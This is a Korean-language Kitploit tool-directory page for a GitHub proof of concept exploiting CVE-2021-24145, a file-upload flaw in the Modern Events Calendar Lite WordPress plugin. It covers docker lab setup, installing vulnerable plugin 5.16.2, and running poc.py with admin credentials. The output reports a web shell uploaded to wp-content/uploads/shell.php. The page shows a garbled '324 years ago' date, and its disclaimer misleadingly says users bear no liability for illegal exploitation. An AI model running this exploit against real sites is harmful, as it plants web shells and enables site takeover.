Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2021-24145 — 워드프레스 파일 업로드 취약점, Modern Events Calendar Lite 워드프레스 플러그인 5.16.5 이전 버전 | Kitploit
도구/GitHubGitHub/dnr6419/cve-2021-24145
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubdnr6419/cve-2021-24145

CVE-2021-24145

워드프레스 파일 업로드 취약점, Modern Events Calendar Lite 워드프레스 플러그인 5.16.5 이전 버전

저장소 보기
324년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2021-24145

WordPress File Upload Vulnerability, Modern Events Calendar Lite WordPress plugin before 5.16.5 https://nvd.nist.gov/vuln/detail/CVE-2021-24145

설치 및 실행 순서

1. WordPress 설치

설치를 진행할 때, docker-compose.yml 파일에서 포트포워딩을 진행해주시기 바랍니다.

root@kitploit:~
 $ docker-compose up  

2. WordPress initial & Plugin installation

http://[web-server ip]:port/로 이동합니다. 기본적인 설치를 진행합니다.
[Plugins] -> [Add New] -> [Upload Plugin] 이동합니다.
modern-events-calendar-lite.5.16.2.zip 을 업로드 및 설치합니다.
아래 화면은 플러그인 설치가 완료된 모습입니다.
설치가 완료되었으면 플러그인을 활성화 시킵니다.

3. PoC

python3 poc.py -T [URL] -P [PORT] -U [Path] -u [admin] -p [password]

root@kitploit:~
 $python3 poc.py -T 172.30.1.48 -P 80 -U / -u 0ppr2s -p 123456

  ______     _______     ____   ___ ____  _      ____  _  _   _ _  _  ____
 / ___\ \   / / ____|   |___ \ / _ \___ \/ |    |___ \| || | / | || || ___|
| |    \ \ / /|  _| _____ __) | | | |__) | |_____ __) | || |_| | || ||___ \
| |___  \ V / | |__|_____/ __/| |_| / __/| |_____/ __/|__   _| |__   _|__) |
 \____|  \_/  |_____|   |_____|\___/_____|_|    |_____|  |_| |_|  |_||____/

                * Wordpress Plugin Modern Events Calendar Lite RCE

                * @Hacker5preme




[+] Authentication successfull !

[+] Shell Uploaded to: http://172.30.1.48:80//wp-content/uploads/shell.php

image

출처

https://github.com/Hacker5preme/Exploits/tree/main/Wordpress/CVE-2021-24145

주의 사항

위 취약점을 불법으로 악용할 시, 법적 책임을 지지 않습니다.

If you illegally exploit the above vulnerabilities, you will not be held liable.

docker 버전을 최신화 해야 합니다.

도구 다운로드